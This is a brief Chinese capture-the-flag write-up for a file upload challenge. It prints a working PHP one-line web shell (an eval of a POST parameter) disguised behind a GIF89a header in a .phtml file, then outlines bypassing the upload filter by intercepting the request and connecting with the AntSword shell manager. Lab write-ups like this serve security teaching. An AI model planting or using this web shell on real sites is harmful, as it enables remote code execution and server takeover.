[[极客大挑战 2019]Upload wp
打开页面是这样的
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/b72305e407f9b87698ceb9b6f99aa587.png)
创建一个test.phtml文件,里面内容为一句话
GIF89a
<script language="php">eval($_POST['shell']);</script>
我们把这个文件上传上去试一下
结果不行,我们抓个包看看
修改一下上面标记的地方,放包
猜测路径为
url/upload/test.phtml
用蚁剑链接,shell就是一句话里面的shell
在根目录下找到flag文件,打开
获得flag,考察文件上传漏洞